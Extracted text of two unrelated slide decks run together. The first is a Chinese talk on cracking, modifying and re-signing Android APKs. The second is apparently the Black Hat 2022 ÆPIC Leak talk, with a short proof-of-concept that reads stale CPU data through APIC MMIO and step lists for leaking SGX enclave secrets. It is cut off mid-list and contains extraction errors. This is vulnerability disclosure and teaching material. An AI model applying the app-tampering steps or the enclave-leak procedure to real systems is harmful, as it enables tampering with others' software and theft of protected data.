這場演講「三不一沒有」
三不一沒有
• 三不
– 我不是駭客(我是魯蛇)
– 我不會Android
– 這場演講不難,大家都聽得懂
• 一沒有
– 這場演講沒有太多梗,有的話幫幫忙笑一下
About
Me
• Joey
Chen
• 目前
- 國立臺灣科技大學資管所 菸酒生 研究生
- Hack-‐Stuff
Technology
Core
member
- 趨勢科技實習生
• 證照
– ISO
27001:2013
– BS
10012:2009
• 經歷
– 2012年駭客年會第三名
– 2013年駭客年會第二名
– 2014年Honeynet
CTF
第二名
• 精專於
- 加解密與數位簽章
- 逆向工程
演講重點
• 今日演講不再「技術」
• 演講重點在於「努力」
• 希望大家找到「熱情」
大綱
• 逆向工程
• 簽章技術
• 工具介紹
• Android
OS
介紹
• 拆解第一個
App
• 修改第一個
App
• 保護
App
• 結論
• Q&A
預備知識(1)
-‐
逆向工程
• Compiler
V.S
Reversing
Engineer
• 直譯式
V.S
編譯式
• 程式語言的不同,
ex
:
C/C++,
.Net
,
Java…
• File
format
的不同,
ex
:
*.exe,
*.dll,
*.jar…
預先處理
編譯
組譯
連結
原始碼
執行檔
*.obj
*.lib
file.obj
工具介紹(1)
-‐
Genymocom
工具介紹(2)
-‐
Sublime
工具介紹(3)
-‐
IDA
pro
預備知識(2)
-‐
數位簽章
發文者
收文者
雜湊
函數
10101010
11111111
簽體
私鑰
加密
11111111
簽體
傳送給收文者
雜湊
函數
10101010
11111111
簽體
公鑰
解密
10101010
Verify
?
Yes
:
No
表示資料未被篡改
且確認發文者身份
Android
OS
資料來源:hgp://en.wikipedia.org/wiki/Android_(operacng_system)
APK
包裝過程
Applicacon
Resources
R.java
.class
File
Applicacon
Source
Code
Java
Interfaces
.aidl
File
aapt
aidl
Java
Compiler
dex
3rd
Party
Libraries
and
.class
File
.dex
File
apkbuilder
Compiler
Resources
Other
Resources
APK
簽章過程
Debug
or
Release
Keystore
Jarsigner
Signed
.apk
Zipalign
(release
mode)
Signed
and
Aligned.apk
使用Zipalign工具對簽名後的APK進行對齊處理,它位於
android-‐sdk/tools,他的主要工作是將apk套件進行對齊處理,
使apk套件中的所有資源檔距離檔案起始偏移為4位元組整數
倍,這樣透過記憶體映射存取apk檔案時速度會更快。
破解第一支
APP
• 破解工具
– Apktool,
dex2jar,
JD-‐GUI,
IDA
pro,
androguard
• 環境
– OSX,
windows,
linux
• 開發工具
– Eclipse,
Android
SDK,
Android
NDK,
genymocon
• 先備語言
– Java,
C/C++,
.Net
檢視
APK
檔案格式
• Apk
:
Android
應用程式套件檔案
– META-‐INF
• MANIFEST.MF
:
清單資訊(Manifest
file)
• CERT.RSA
:
儲存著該應用程式的憑證和授權資訊。
• CERT.SF
:
儲存著 SHA-‐1
資訊資源清單
– Lib
:
已編譯好的程式
– Res
:不需要被編譯的檔案,
ex
:
*.png,
*jpg
…
– Assets
:用於存放需要打包到應用程式的靜態檔,以便部署到設備中,
ex
:
政策條款等等…
– AndroidManifest.xml
:傳統的Android清單檔案,有該應用程式名字、
版本號、所需權限、註冊服務、連結的其他應用程式名稱
– classes.dex
:
classes檔案通過DEX編譯後的檔案格式,用於在Dalvik虛
擬機器上執行的主要代碼部分
– resources.arsc
:
有被編譯過的檔案,
ex
:
被編譯過的xml
Apktool
:
A
Tool
for
Reverse
APK
• Features
– Disassembling
resources
to
nearly
original
form
(including
resources.arsc,
classes.dex,
*.png.
and
XMLs)
– Rebuilding
decoded
resources
back
to
binary
APK/JAR
– Organizing
and
handling
APKs
that
depend
on
framework
resources
– Smali
Debugging
• Requirements
– Java
7
(JRE
1.7)
– Basic
knowledge
of
Android
SDK,
AAPT
and
smali
資料來源:hgp://ibotpeaches.github.io/Apktool/
Smali
V.S
Classes.dex
• *.smali
– 一種組合語言
– 極為貼近 Dalvik
VM
所接受的 DEX
檔案的組合語言形式
– 不同於Java
– 使用apktool
才會出現
• Classes.dex
– Java
位元的
Binary
code
– Android使用的dalvik虛擬機器與標準的java虛擬機器是
不相容的
– dex檔與class檔相比,不論是檔結構還是opcode都不一
樣
– 使用unzip才會出現
神器:dex2jar,
JD-‐GUI
• Dex2jar
– 將*.dex轉換成*.jar
– 其他功能 ex
:
d2j-‐apk-‐sign.sh,
d2j-‐jar2dex.sh,
d2j-‐
asm-‐verify.sh,
d2j-‐jar2jasmin.sh,
d2j-‐decrpyt-‐
string.sh,
d2j-‐jasmin2jar.sh,
d2j-‐dex-‐asmifier.sh,
dex-‐dump.sh,
d2j-‐dex-‐dump.sh…
• JD-‐GUI
– JD-‐GUI
可反編譯*.jar,將
java
原始碼還原
– 透過
code
review
理解程式的邏輯與重要的
funccon
篡改修改
APK
的方法
• 只能修改 smali,
因為原生語言無法重新編譯
回
*.jar
,但是修改
*.smali
他只需要拉進
IDE
修改組合語言的部分,存檔再重新打包
Apk
• 今天不是來教大家看組合語言
• 今天希望大家能夠理解程式邏輯、系統邏
輯以及檔案格式
Smali
的跳躍指令
• “if-‐testz
vAA,
+BBBB”
條件跳躍指令。拿 vAA
暫存器與0比較,如果比較結果滿足或值為
0時就跳躍到
BBBB
指定的偏移處。偏移量
BBBB
不能為0。
• “if-‐eqz”
如果 vAA
為0則跳躍。Java
語法表
示”if(!vAA)”
• “if-‐nez”
如果 vAA
不為0則跳躍。Java
語法表
示”if(vAA)”
程式邏輯(科技始終來自於人性)
重新打包回APK
• Apktool
b
ff
(打包
剛剛反編譯出來的
資料夾)
• 但是Apk尚未簽章
• jarsigner
-‐verbose
-‐
keystore
rdss.keystore
-‐
signedjar
ffx.apk
ff.apk
rdss
深入淺出
META-‐INF
• ⽐比較發現
RDSS.SF
⽐比
MANIFEST.MF
多了⼀一個
SHA1-‐Digest-‐Manifest
的值,這個值其實是
MANIFEST.MF
⽂文件的
SHA1
接著用 base64
編碼的值,可以⼿手動驗證,也可以從
android/tool源碼分析。
• SHA1-‐Digest-‐Manifest
是
MANIFEST.MF
文件
的
SHA1
接著用
base64
編碼的結果。
保護APP(1)
• Isolate
Java
Program
– 將較敏感或重要的
class
檔案放在
server
中,利
用動態載入的方法,來避免駭客去反編譯整支
程式
• Encrypt
Class
File
– 使用
AES,
DES…
去加密重要的
class
檔案,使駭
客即使反編譯,也只能看到亂碼
• Convert
to
Nacve
Codes
– 利用
Android
NDK
在
Project
裡面寫
C/C++
使得
反編譯的易讀大大提升難度,更別提程式中的
加密演算法
保護APP(2)
• Code
Obfuscacon
– 可以使用”ProGuard”通過移除不用的代碼,用
語義上混淆的名字來重命名分類、欄位和方法
等手段來壓縮、優化和混淆你的代碼
• Online
Encrypcon
– hgp://sourceforge.net/projects/apkprotect/
這個
網站提供了跨語言(Java,
C/C++)的保護,可
以達到反編譯反組譯的的功能
– hgps://dexprotector.com/node/4627
直接針對
*.dex
檔案進行保護,加密檔案、訊息,隱藏
funccon
call
,確保完整性
結論
• 學習
Android
逆向,一步一步來,從根本出
發,從檔案、系統、格式都要理解
• 學習工具的使用,再強的高手都要使用工
具來幫助自己,減少時間的耗費
• 學習簽章、密碼學,資訊安全最後的一道
防線,系統會有漏洞,人為會有疏失,密
碼系統雖不保證絕對但增加了一定的難度
• 學習不要心急,經驗與知識是靠累積,大
家一起努力,加油
延伸議題
and
Q&A
• 一般 Apk
的簽章期限多久?
• Update
Apk
需要一樣的簽章嗎?
• 利用 jarsigner
簽的Apk跟之前的簽章相同嗎?
• 重新打包 Apk
會有風險嗎?
• 可以在不反編譯或解壓縮的情況下塞檔案
進 Apk
嗎? | pdf |
Architecturally Leaking Data from the
Microarchitecture
Black Hat USA 2022
Pietro Borrello
Sapienza University of Rome
Andreas Kogler
Graz University of Technology
Martin Schwarzl
Graz University of Technology
Moritz Lipp
Amazon Web Services
Daniel Gruss
Graz University of Technology
Michael Schwarz
CISPA Helmholtz Center for Information Security
ÆPIC Leak: Architecturally Leaking
Uninitialized Data from the Microarchitecture
Black Hat USA 2022
Pietro Borrello
Sapienza University of Rome
Andreas Kogler
Graz University of Technology
Martin Schwarzl
Graz University of Technology
Moritz Lipp
Amazon Web Services
Daniel Gruss
Graz University of Technology
Michael Schwarz
CISPA Helmholtz Center for Information Security
ÆPIC Leak
• First architectural bug leaking data without a side channel
1
Pietro Borrello (@borrello pietro)
Andreas Kogler (@0xhilbert)
ÆPIC Leak
• First architectural bug leaking data without a side channel
• Not a transient execution attack
1
Pietro Borrello (@borrello pietro)
Andreas Kogler (@0xhilbert)
ÆPIC Leak
• First architectural bug leaking data without a side channel
• Not a transient execution attack
• Deterministically leak stale data from SGX enclaves
1
Pietro Borrello (@borrello pietro)
Andreas Kogler (@0xhilbert)
ÆPIC Leak
• First architectural bug leaking data without a side channel
• Not a transient execution attack
• Deterministically leak stale data from SGX enclaves
• No hyperthreading required
1
Pietro Borrello (@borrello pietro)
Andreas Kogler (@0xhilbert)
ÆPIC Leak
• First architectural bug leaking data without a side channel
• Not a transient execution attack
• Deterministically leak stale data from SGX enclaves
• No hyperthreading required
• 10th, 11th, and 12th gen Intel CPUs affected
1
Pietro Borrello (@borrello pietro)
Andreas Kogler (@0xhilbert)
Outline
1. ÆPIC Leak
2. Understand what we leak
3. Control what we leak
4. Exploit ÆPIC Leak
5. Mitigations
2
Pietro Borrello (@borrello pietro)
Andreas Kogler (@0xhilbert)
What is ÆPIC Leak?
Advanced Programmable Interrupt Controller (APIC)
Generate, receive and forward interrupts in modern CPUs.
• Local APIC for each CPU
• I/O APIC towards external devices
• Exposes registers
3
Pietro Borrello (@borrello pietro)
Andreas Kogler (@0xhilbert)
APIC MMIO
• Memory-mapped APIC registers
0
4
8
12
0x00
Timer
0x10
Thermal
0x20
ICR bits
0-31
0x30
ICR bits 32-63
4
Pietro Borrello (@borrello pietro)
Andreas Kogler (@0xhilbert)
APIC MMIO
• Memory-mapped APIC registers
• Controlled by MSR IA32 APIC BASE (default 0xFEE00000)
0
4
8
12
0xFEE00000:
0x00
Timer
0x10
Thermal
0x20
ICR bits
0-31
0x30
ICR bits 32-63
4
Pietro Borrello (@borrello pietro)
Andreas Kogler (@0xhilbert)
APIC MMIO
• Memory-mapped APIC registers
• Controlled by MSR IA32 APIC BASE (default 0xFEE00000)
• Mapped as 32bit values, aligned to 16 bytes
0
4
8
12
0xFEE00000:
0x00
Timer
0x10
Thermal
0x20
ICR bits
0-31
0x30
ICR bits 32-63
4
Pietro Borrello (@borrello pietro)
Andreas Kogler (@0xhilbert)
APIC MMIO
• Memory-mapped APIC registers
• Controlled by MSR IA32 APIC BASE (default 0xFEE00000)
• Mapped as 32bit values, aligned to 16 bytes
• Should not be accessed at bytes 4 through 15.
0
4
8
12
0xFEE00000:
0x00
Timer
0x10
Thermal
0x20
ICR bits
0-31
0x30
ICR bits 32-63
4
Pietro Borrello (@borrello pietro)
Andreas Kogler (@0xhilbert)
Intel Manual Vol. 3a
Any access that touches bytes 4 through 15 of an APIC register may
cause undefined behavior and must not be executed. This undefined
behavior could include hangs, incorrect results, or unexpected excep-
tions.
5
Pietro Borrello (@borrello pietro)
Andreas Kogler (@0xhilbert)
Intel Manual Vol. 3a
Any access that touches bytes 4 through 15 of an APIC register may
cause undefined behavior and must not be executed. This undefined
behavior could include hangs, incorrect results, or unexpected excep-
tions.
Let’s try this!
5
Pietro Borrello (@borrello pietro)
Andreas Kogler (@0xhilbert)
Tweetable PoC
u8 *apic_base = map_phys_addr(0xFEE00000);
dump(&apic_base[0]);
dump(&apic_base[4]);
dump(&apic_base[8]);
dump(&apic_base[12]);
/* ... */
output:
6
Pietro Borrello (@borrello pietro)
Andreas Kogler (@0xhilbert)
Tweetable PoC
u8 *apic_base = map_phys_addr(0xFEE00000);
dump(&apic_base[0]);
// no leak
dump(&apic_base[4]);
dump(&apic_base[8]);
dump(&apic_base[12]);
/* ... */
output:
FEE00000:
00 00 00 00
....
6
Pietro Borrello (@borrello pietro)
Andreas Kogler (@0xhilbert)
Tweetable PoC
u8 *apic_base = map_phys_addr(0xFEE00000);
dump(&apic_base[0]);
// no leak
dump(&apic_base[4]);
// LEAK!
dump(&apic_base[8]);
dump(&apic_base[12]);
/* ... */
output:
FEE00000:
00 00 00 00 57 41 52 4E
....WARN
6
Pietro Borrello (@borrello pietro)
Andreas Kogler (@0xhilbert)
Tweetable PoC
u8 *apic_base = map_phys_addr(0xFEE00000);
dump(&apic_base[0]);
// no leak
dump(&apic_base[4]);
// LEAK!
dump(&apic_base[8]);
// LEAK!
dump(&apic_base[12]);
/* ... */
output:
FEE00000:
00 00 00 00 57 41 52 4E 5F 49 4E 54
....WARN_INT
6
Pietro Borrello (@borrello pietro)
Andreas Kogler (@0xhilbert)
Tweetable PoC
u8 *apic_base = map_phys_addr(0xFEE00000);
dump(&apic_base[0]);
// no leak
dump(&apic_base[4]);
// LEAK!
dump(&apic_base[8]);
// LEAK!
dump(&apic_base[12]); // LEAK!
/* ... */
output:
FEE00000:
00 00 00 00 57 41 52 4E 5F 49 4E 54 45 52 52 55
....WARN_INTERRU
6
Pietro Borrello (@borrello pietro)
Andreas Kogler (@0xhilbert)
Tweetable PoC
u8 *apic_base = map_phys_addr(0xFEE00000);
dump(&apic_base[0]);
// no leak
dump(&apic_base[4]);
// LEAK!
dump(&apic_base[8]);
// LEAK!
dump(&apic_base[12]); // LEAK!
/* ... */
output:
FEE00000:
00 00 00 00 57 41 52 4E 5F 49 4E 54 45 52 52 55
....WARN_INTERRU
FEE00010:
00 00 00 00 4F 55 52 43 45 5F 50 45 4E 44 49 4E
....OURCE_PENDIN
FEE00020:
00 00 00 00 46 49 5F 57 41 52 4E 5F 49 4E 54 45
....FI_WARN_INTE
FEE00030:
00 00 00 00 54 5F 53 4F 55 52 43 45 5F 51 55 49
....T_SOURCE_QUI
6
Pietro Borrello (@borrello pietro)
Andreas Kogler (@0xhilbert)
What are we leaking?
We architecturally read stale values!
7
Pietro Borrello (@borrello pietro)
Andreas Kogler (@0xhilbert)
What are we leaking?
We architecturally read stale values!
Data?
FEE00000:
00 00 00 00 57 41 52 4E 5F 49 4E 54 45 52 52 55
....WARN_INTERRU
FEE00010:
00 00 00 00 4F 55 52 43 45 5F 50 45 4E 44 49 4E
....OURCE_PENDIN
7
Pietro Borrello (@borrello pietro)
Andreas Kogler (@0xhilbert)
What are we leaking?
We architecturally read stale values!
Data?
FEE00000:
00 00 00 00 57 41 52 4E 5F 49 4E 54 45 52 52 55
....WARN_INTERRU
FEE00010:
00 00 00 00 4F 55 52 43 45 5F 50 45 4E 44 49 4E
....OURCE_PENDIN
FEE00000:
00 00 00 00 75 1A 85 C9 75 05 48 83 C8 FF C3 B8
.....u...u.H.....
7
Pietro Borrello (@borrello pietro)
Andreas Kogler (@0xhilbert)
What are we leaking?
We architecturally read stale values!
Data?
FEE00000:
00 00 00 00 57 41 52 4E 5F 49 4E 54 45 52 52 55
....WARN_INTERRU
FEE00010:
00 00 00 00 4F 55 52 43 45 5F 50 45 4E 44 49 4E
....OURCE_PENDIN
Instructions?!
FEE00000:
00 00 00 00 75 1A 85 C9 75 05 48 83 C8 FF C3 B8
.....u...u.H.....
7
Pietro Borrello (@borrello pietro)
Andreas Kogler (@0xhilbert)
What are we leaking?
We architecturally read stale values!
Data?
FEE00000:
00 00 00 00 57 41 52 4E 5F 49 4E 54 45 52 52 55
....WARN_INTERRU
FEE00010:
00 00 00 00 4F 55 52 43 45 5F 50 45 4E 44 49 4E
....OURCE_PENDIN
Instructions?!
FEE00000:
00 00 00 00 75 1A 85 C9 75 05 48 83 C8 FF C3 B8
.....u...u.H.....
0:
75 1a
jne
0x1c
2:
85 c9
test
ecx,
ecx
4:
75 05
jne
0xb
6:
48 83 c8 ff
or
rax,
0xffffffffffffffff
a:
c3
ret
7
Pietro Borrello (@borrello pietro)
Andreas Kogler (@0xhilbert)
Reading Undefined Ranges
CPU
Read
Haswell
✗
Skylake
✗
Coffe Lake
✗
Comet Lake
✗
Tiger Lake
✓
Ice Lake
✓
Alder Lake
✓
On most CPUs:
• Read 0x00
• Read 0xFF
• CPU Hang
• Triple fault
Not on 10th, 11th and 12th gen CPUs!
8
Pietro Borrello (@borrello pietro)
Andreas Kogler (@0xhilbert)
Where do we leak from?
Ruling out microarchitectural elements
Core
Thread
Registers
Thread
Registers
Execution Engine
L1
MOB
L2
TLB
Superqueue
LLC
Memory Controller
RAM
9
Pietro Borrello (@borrello pietro)
Andreas Kogler (@0xhilbert)
Ruling out microarchitectural elements
Core
Thread
Registers
Thread
Registers
Execution Engine
L1
MOB
L2
TLB
Superqueue
LLC
Memory Controller
RAM
9
Pietro Borrello (@borrello pietro)
Andreas Kogler (@0xhilbert)
Ruling out microarchitectural elements
Core
Thread
Registers
Thread
Registers
Execution Engine
L1
MOB
L2
TLB
Superqueue
LLC
Memory Controller
RAM
9
Pietro Borrello (@borrello pietro)
Andreas Kogler (@0xhilbert)
Ruling out microarchitectural elements
Core
Thread
Registers
Thread
Registers
Execution Engine
L1
MOB
L2
TLB
Superqueue
LLC
Memory Controller
RAM
9
Pietro Borrello (@borrello pietro)
Andreas Kogler (@0xhilbert)
Ruling out microarchitectural elements
Core
Thread
Registers
Thread
Registers
Execution Engine
L1
MOB
L2
TLB
Superqueue
LLC
Memory Controller
RAM
9
Pietro Borrello (@borrello pietro)
Andreas Kogler (@0xhilbert)
The Superqueue
• It’s the decoupling buffer between L2 and LLC
10
Pietro Borrello (@borrello pietro)
Andreas Kogler (@0xhilbert)
The Superqueue
• It’s the decoupling buffer between L2 and LLC
• Contains data passed between L2 and LLC
10
Pietro Borrello (@borrello pietro)
Andreas Kogler (@0xhilbert)
The Superqueue
• It’s the decoupling buffer between L2 and LLC
• Contains data passed between L2 and LLC
• Like Line Fill Buffers for L1 and L2
10
Pietro Borrello (@borrello pietro)
Andreas Kogler (@0xhilbert)
Leakage Analysis
• We can leak only undefined APIC offsets: i.e., 3/4 of a cache line
0
4
8
12
0x00
0x10
0x20
0x30
0x40
0x50
0x60
0x70
Leaked Addresses
11
Pietro Borrello (@borrello pietro)
Andreas Kogler (@0xhilbert)
Leakage Analysis
• We can leak only undefined APIC offsets: i.e., 3/4 of a cache line
• We only observe even cache lines
0
4
8
12
0x00
0x10
0x20
0x30
0x40
0x50
0x60
0x70
Leaked Addresses
11
Pietro Borrello (@borrello pietro)
Andreas Kogler (@0xhilbert)
Threat Model
• We leak data from the Superqueue (SQ)
12
Pietro Borrello (@borrello pietro)
Andreas Kogler (@0xhilbert)
Threat Model
• We leak data from the Superqueue (SQ)
• Like an uninitialized memory read, but in the CPU
12
Pietro Borrello (@borrello pietro)
Andreas Kogler (@0xhilbert)
Threat Model
• We leak data from the Superqueue (SQ)
• Like an uninitialized memory read, but in the CPU
• We need access to APIC MMIO region
12
Pietro Borrello (@borrello pietro)
Andreas Kogler (@0xhilbert)
Threat Model
• We leak data from the Superqueue (SQ)
• Like an uninitialized memory read, but in the CPU
• We need access to APIC MMIO region
→ Let’s leak data from SGX enclaves!
12
Pietro Borrello (@borrello pietro)
Andreas Kogler (@0xhilbert)
Intel Software Guard eXtensions (SGX) 101
• SGX: isolates environments against priviledged attackers
13
Pietro Borrello (@borrello pietro)
Andreas Kogler (@0xhilbert)
Intel Software Guard eXtensions (SGX) 101
• SGX: isolates environments against priviledged attackers
• Transparently encrypts pages in the Enclave Page Cache (EPC)
13
Pietro Borrello (@borrello pietro)
Andreas Kogler (@0xhilbert)
Intel Software Guard eXtensions (SGX) 101
• SGX: isolates environments against priviledged attackers
• Transparently encrypts pages in the Enclave Page Cache (EPC)
• Pages can be moved between EPC and RAM
13
Pietro Borrello (@borrello pietro)
Andreas Kogler (@0xhilbert)
Intel Software Guard eXtensions (SGX) 101
• SGX: isolates environments against priviledged attackers
• Transparently encrypts pages in the Enclave Page Cache (EPC)
• Pages can be moved between EPC and RAM
• Use State Save Area (SSA) for context swithces
13
Pietro Borrello (@borrello pietro)
Andreas Kogler (@0xhilbert)
Intel Software Guard eXtensions (SGX) 101
• SGX: isolates environments against priviledged attackers
• Transparently encrypts pages in the Enclave Page Cache (EPC)
• Pages can be moved between EPC and RAM
• Use State Save Area (SSA) for context swithces
• Stores enclave state during switches
• Inlcuding register values
13
Pietro Borrello (@borrello pietro)
Andreas Kogler (@0xhilbert)
Building Blocks
• We can already sample data from SGX enclaves!
• But, how to leak interesting data?
14
Pietro Borrello (@borrello pietro)
Andreas Kogler (@0xhilbert)
Building Blocks
• We can already sample data from SGX enclaves!
• But, how to leak interesting data?
• Can we force data into the SQ?
14
Pietro Borrello (@borrello pietro)
Andreas Kogler (@0xhilbert)
Building Blocks
• We can already sample data from SGX enclaves!
• But, how to leak interesting data?
• Can we force data into the SQ?
• Can we keep data in the SQ?
14
Pietro Borrello (@borrello pietro)
Andreas Kogler (@0xhilbert)
Enclave Shaking
Force Data into the SQ: Enclave Shaking
• Abuse the EWB and ELDU instructions for page swapping
15
Pietro Borrello (@borrello pietro)
Andreas Kogler (@0xhilbert)
Force Data into the SQ: Enclave Shaking
• Abuse the EWB and ELDU instructions for page swapping
• EWB instruction:
• Encrypts and stores an enclave page to RAM
15
Pietro Borrello (@borrello pietro)
Andreas Kogler (@0xhilbert)
Force Data into the SQ: Enclave Shaking
• Abuse the EWB and ELDU instructions for page swapping
• EWB instruction:
• Encrypts and stores an enclave page to RAM
• ELDU instruction:
• Decrypts and loads an enclave page from RAM
15
Pietro Borrello (@borrello pietro)
Andreas Kogler (@0xhilbert)
Force Data into the SQ: Enclave Shaking
Core
RAM
Thread
Registers
Thread
Registers
Execution Engine
L1
MOB
L2
TLB
Superqueue
LLC
Memory Controller
EPC
P1
16
Pietro Borrello (@borrello pietro)
Andreas Kogler (@0xhilbert)
Force Data into the SQ: Enclave Shaking
EWB
Core
RAM
Thread
Registers
Thread
Registers
Execution Engine
L1
MOB
L2
TLB
Superqueue
LLC
Memory Controller
EPC
P1
E(P1)
16
Pietro Borrello (@borrello pietro)
Andreas Kogler (@0xhilbert)
Force Data into the SQ: Enclave Shaking
Core
RAM
Thread
Registers
Thread
Registers
Execution Engine
L1
MOB
L2
TLB
Superqueue
LLC
Memory Controller
EPC
P1
E(P1)
16
Pietro Borrello (@borrello pietro)
Andreas Kogler (@0xhilbert)
Force Data into the SQ: Enclave Shaking
Core
RAM
Thread
Registers
Thread
Registers
Execution Engine
L1
MOB
L2
TLB
Superqueue
LLC
Memory Controller
EPC
P1
P2
E(P1)
16
Pietro Borrello (@borrello pietro)
Andreas Kogler (@0xhilbert)
Force Data into the SQ: Enclave Shaking
ELDU
Core
RAM
Thread
Registers
Thread
Registers
Execution Engine
L1
MOB
L2
TLB
Superqueue
LLC
Memory Controller
EPC
P1
D(P2)
P2
E(P1)
16
Pietro Borrello (@borrello pietro)
Andreas Kogler (@0xhilbert)
Force Data into the SQ: Enclave Shaking
Core
RAM
Thread
Registers
Thread
Registers
Execution Engine
L1
MOB
L2
TLB
Superqueue
LLC
Memory Controller
EPC
P1
D(P2)
P2
E(P1)
16
Pietro Borrello (@borrello pietro)
Andreas Kogler (@0xhilbert)
Cache Line Freezing
Keep Data in the SQ: Cache Line Freezing
We do not need hyperthreading, but we can use it!
17
Pietro Borrello (@borrello pietro)
Andreas Kogler (@0xhilbert)
Keep Data in the SQ: Cache Line Freezing
We do not need hyperthreading, but we can use it!
• The SQ is shared between hyperthreads
17
Pietro Borrello (@borrello pietro)
Andreas Kogler (@0xhilbert)
Keep Data in the SQ: Cache Line Freezing
We do not need hyperthreading, but we can use it!
• The SQ is shared between hyperthreads
• An hyperthread affects the SQ’s content
17
Pietro Borrello (@borrello pietro)
Andreas Kogler (@0xhilbert)
Keep Data in the SQ: Cache Line Freezing
We do not need hyperthreading, but we can use it!
• The SQ is shared between hyperthreads
• An hyperthread affects the SQ’s content
• Theory: Zero blocks are not transfered over the SQ
17
Pietro Borrello (@borrello pietro)
Andreas Kogler (@0xhilbert)
Keep Data in the SQ: Cache Line Freezing
We do not need hyperthreading, but we can use it!
• The SQ is shared between hyperthreads
• An hyperthread affects the SQ’s content
• Theory: Zero blocks are not transfered over the SQ
• But how?
17
Pietro Borrello (@borrello pietro)
Andreas Kogler (@0xhilbert)
Keep Data in the SQ: Cache Line Freezing
L1/L2 Caches
Superqueue
Memory
Thread 1
Access:
Thread 2
Access:
0xdeadbXXX
0x13370XXX
SECRET
xxxxxxxx
SECRET
18
Pietro Borrello (@borrello pietro)
Andreas Kogler (@0xhilbert)
Keep Data in the SQ: Cache Line Freezing
L1/L2 Caches
Superqueue
Memory
Thread 1
Access:
Thread 2
Access:
0xdeadbXXX
0x13370XXX
SECRET
SECRET
xxxxxxxx
SECRET
18
Pietro Borrello (@borrello pietro)
Andreas Kogler (@0xhilbert)
Keep Data in the SQ: Cache Line Freezing
L1/L2 Caches
Superqueue
Memory
Thread 1
Access:
Thread 2
Access:
0xdeadbXXX
0x13370XXX
SECRET
SECRET
SECRET
xxxxxxxx
SECRET
18
Pietro Borrello (@borrello pietro)
Andreas Kogler (@0xhilbert)
Keep Data in the SQ: Cache Line Freezing
L1/L2 Caches
Superqueue
Memory
Thread 1
Access:
Thread 2
Access:
0xdeadbXXX
0x13370XXX
SECRET
SECRET
SECRET
xxxxxxxx
SECRET
18
Pietro Borrello (@borrello pietro)
Andreas Kogler (@0xhilbert)
Keep Data in the SQ: Cache Line Freezing
L1/L2 Caches
Superqueue
Memory
Thread 1
Access:
Thread 2
Access:
0xdeadbXXX
0x13370XXX
SECRET
SECRET
xxxxxxxx
xxxxxxxx
SECRET
18
Pietro Borrello (@borrello pietro)
Andreas Kogler (@0xhilbert)
Keep Data in the SQ: Cache Line Freezing
L1/L2 Caches
Superqueue
Memory
Thread 1
Access:
Thread 2
Access:
0xdeadbXXX
0x13370XXX
SECRET
xxxxxxxx
xxxxxxxx
xxxxxxxx
SECRET
18
Pietro Borrello (@borrello pietro)
Andreas Kogler (@0xhilbert)
Keep Data in the SQ: Cache Line Freezing
L1/L2 Caches
Superqueue
Memory
Thread 1
Access:
Thread 2
Access:
0xdeadbXXX
0x13370XXX
SECRET
xxxxxxxx
xxxxxxxx
xxxxxxxx
SECRET
18
Pietro Borrello (@borrello pietro)
Andreas Kogler (@0xhilbert)
Keep Data in the SQ: Cache Line Freezing
L1/L2 Caches
Superqueue
Memory
Thread 1
Access:
Thread 2
Access:
0xdeadbXXX
0x13370XXX
SECRET
SECRET
00000000000
18
Pietro Borrello (@borrello pietro)
Andreas Kogler (@0xhilbert)
Keep Data in the SQ: Cache Line Freezing
L1/L2 Caches
Superqueue
Memory
Thread 1
Access:
Thread 2
Access:
0xdeadbXXX
0x13370XXX
SECRET
SECRET
SECRET
00000000000
18
Pietro Borrello (@borrello pietro)
Andreas Kogler (@0xhilbert)
Keep Data in the SQ: Cache Line Freezing
L1/L2 Caches
Superqueue
Memory
Thread 1
Access:
Thread 2
Access:
0xdeadbXXX
0x13370XXX
SECRET
SECRET
SECRET
SECRET
00000000000
18
Pietro Borrello (@borrello pietro)
Andreas Kogler (@0xhilbert)
Keep Data in the SQ: Cache Line Freezing
L1/L2 Caches
Superqueue
Memory
Thread 1
Access:
Thread 2
Access:
0xdeadbXXX
0x13370XXX
SECRET
SECRET
SECRET
SECRET
00000000000
18
Pietro Borrello (@borrello pietro)
Andreas Kogler (@0xhilbert)
Keep Data in the SQ: Cache Line Freezing
L1/L2 Caches
Superqueue
Memory
Thread 1
Access:
Thread 2
Access:
0xdeadbXXX
0x13370XXX
SECRET
SECRET
SECRET
SECRET
00000000000
18
Pietro Borrello (@borrello pietro)
Andreas Kogler (@0xhilbert)
Keep Data in the SQ: Cache Line Freezing
L1/L2 Caches
Superqueue
Memory
Thread 1
Access:
Thread 2
Access:
0xdeadbXXX
0x13370XXX
SECRET
SECRET
SECRET
SECRET
00000000000
*
18
Pietro Borrello (@borrello pietro)
Andreas Kogler (@0xhilbert)
Keep Data in the SQ: Cache Line Freezing
L1/L2 Caches
Superqueue
Memory
Thread 1
Access:
Thread 2
Access:
0xdeadbXXX
0x13370XXX
SECRET
SECRET
SECRET
00000000000
*
00000000000
18
Pietro Borrello (@borrello pietro)
Andreas Kogler (@0xhilbert)
Keep Data in the SQ: Cache Line Freezing
L1/L2 Caches
Superqueue
Memory
Thread 1
Access:
Thread 2
Access:
0xdeadbXXX
0x13370XXX
SECRET
SECRET
SECRET
00000000000
*
00000000000
18
Pietro Borrello (@borrello pietro)
Andreas Kogler (@0xhilbert)
ÆPIC Leak
Exploit ÆPIC Leak
A A A A A A A A
B B B B B B B B
X X X X X X X X
Superqueue
APIC
IRR
???
ISR
???
EOI
???
Victim (SGX)
L3 load/store
Attacker
request
X X X X X X X
(stale data)
IRR
response
Combine:
• Enclave Shaking
• Cache Line Freezing
19
Pietro Borrello (@borrello pietro)
Andreas Kogler (@0xhilbert)
Exploit ÆPIC Leak
• We can leak 3/4 of even cache lines
0
4
8
12
0x00
0x10
0x20
0x30
Memory Addresses
20
Pietro Borrello (@borrello pietro)
Andreas Kogler (@0xhilbert)
Exploit ÆPIC Leak
• We can leak 3/4 of even cache lines
• From any arbitrary SGX page
0
4
8
12
0x00
0x10
0x20
0x30
Memory Addresses
20
Pietro Borrello (@borrello pietro)
Andreas Kogler (@0xhilbert)
Exploit ÆPIC Leak
• We can leak 3/4 of even cache lines
• From any arbitrary SGX page
• Without the enclave running!
0
4
8
12
0x00
0x10
0x20
0x30
Memory Addresses
20
Pietro Borrello (@borrello pietro)
Andreas Kogler (@0xhilbert)
Leaking Data and Code Pages
1. Start the enclave
2. Stop when the data is loaded
3. Move the page out (EWB) and perform Cache Line Freezing
4. Leak via APIC MMIO
5. Move the page in (ELDU)
6. Goto 3 until enough confidence
21
Pietro Borrello (@borrello pietro)
Andreas Kogler (@0xhilbert)
Leaking Register Content
1. Start the enclave
2. Stop at the target instruction
